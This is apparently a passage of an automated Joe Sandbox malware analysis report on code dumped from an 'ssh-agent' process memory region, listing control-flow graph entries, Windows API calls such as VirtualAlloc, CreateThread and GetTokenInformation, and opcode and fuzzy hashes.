                                                                                                                                                                                • Instruction Fuzzy Hash: A5F0B43550C941DBCAF58B18D8407FA67A8BF51F00B6C0099C446CB122CE2CEC41E753

Execution Graph

Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 66
Total number of Limit Nodes: 4
execution_graph: rendered graph omitted; its nodes cover the functions at 8f5b8f, 8f58de, 8f83e7, 8f81e3, 8f5d22, 8f8201 and 8f5d50, with API nodes VirtualAlloc, CreateThread, CloseHandle, GetTokenInformation and wcscpy

Control-flow Graph

control_flow_graph: entry 8f81c0; rendered graph omitted (API nodes: CloseHandle, GetTokenInformation; calls 9272f4, 9272ec)
Memory Dump Source
• Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
• Instruction ID: 651a52d1c89510807028b1b8fccb50bc2ddf97b5736461186fa5c8d9344ccc50
• Opcode Fuzzy Hash: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
• Instruction Fuzzy Hash: 73B1153051DE4DCFCB29CB2C8881239B7A6FF95314F288659D59BC72A6DE35AC028352

Control-flow Graph

control_flow_graph: entry 8f5b8f; rendered graph omitted (API nodes: CreateThread, CloseHandle; calls 9053f0, 928358, 910320, 8f81c0, 9272ec, 8f5e60, 8f5990, 8f52d0, 8f5df0, 911520)
APIs
Memory Dump Source
• Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
• Instruction ID: 79dcc0af2dea6fa77f4c61e07e819c43e61650aff51716bbfc55ea7235f5f1f8
• Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
• Instruction Fuzzy Hash: 4641F720609F0D8FDB68A73C945D3393AD1FB99328F6801BAD307CB1A6DB648D419752

Control-flow Graph

control_flow_graph: entry 8f5d22; rendered graph omitted (API nodes: CreateThread, CloseHandle; calls 8f52d0, 8f5e60, 8f5990)
APIs
Memory Dump Source
• Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0
• Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
• Instruction ID: 7e23aee133ebb32cf12a1c059179418a4953d9bbdb778f0c7dafc1dfb9fcdc9a
• Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
• Instruction Fuzzy Hash: BBF0242161EF0D85DB3CA738885933A62C1F799339F740B3ED367C90E4EA248901924A

Control-flow Graph

control_flow_graph: entry 8f5d50; rendered graph omitted (API nodes: CreateThread, CloseHandle; calls 8f5e60, 8f5990, 8f52d0)
APIs
Memory Dump Source
• Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0
• Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
• Instruction ID: afb9095fd4c6370c1fd029d84c124b6ecaaac480d0902046576d2b545f8bf5c4
• Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
• Instruction Fuzzy Hash: 3CB0120502AF8E651025373014081380980FF46A78BB51F7C9FB3C6CD2F8000C046365

Control-flow Graph

control_flow_graph: entry 8f5990; rendered graph omitted (API node: VirtualAlloc; calls 929b00, 911080, 922320, 8f5df0, 911470, 92233c)
APIs
Memory Dump Source
• Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
• Instruction ID: 0922e31ac5e97bbb0edc32386d9f1252a2acadc95a895173d2831fbde5e8df95
• Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
• Instruction Fuzzy Hash: 03213A2061DEBC8FC36B933854D17B52AA2F799328F6803CBD386CB192D9284D258253

Control-flow Graph

control_flow_graph: entry 8f8245; rendered graph omitted (API nodes: CloseHandle, GetTokenInformation; calls 9272f4, 9272ec)
APIs
Memory Dump Source
• Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                • Instruction ID: 3745a690012838a8726003a5d477edd8b6c497e324f1f49a98600f88409eafa5
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                • Instruction Fuzzy Hash: E5F0CD3552DA5DCFC726873490504396BA1FF51754F6900EEE746C7663CE24EC01D752

Control-flow Graph

• Executed
• Not Executed
Control-flow graph (rendered graph not reproduced; its basic blocks reference CloseHandle, GetTokenInformation, call 9272ec and call 9272f4)
APIs
Memory Dump Source
• Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
• Instruction ID: 94234a95a69fb22203bf323119f0a60a5c7675fcb6aa520f031b41931420f362
• Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
• Instruction Fuzzy Hash: 2CF06D3552894DCB87298634844053A6760FF51798F7C106AD746CA623CE34FC01E752

Control-flow Graph

• Executed
• Not Executed
Control-flow graph (rendered graph not reproduced; its basic blocks reference CloseHandle, GetTokenInformation, call 9272ec and call 9272f4)
APIs
• CloseHandle.KERNELBASE ref: 008F830B
• GetTokenInformation.KERNELBASE ref: 008F8369
Memory Dump Source
• Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
Similarity
• API ID: CloseHandleInformationToken
• String ID:
• API String ID: 3954737543-0
• Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
• Instruction ID: 81d52339b486974d25125c456aed15e9bcce767850a66c707880b3af1756e7b5
• Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
• Instruction Fuzzy Hash: 9DF06D3442964DCB8B258A34885053577A0FF21798F78016AD746CA223CE24ED42EB62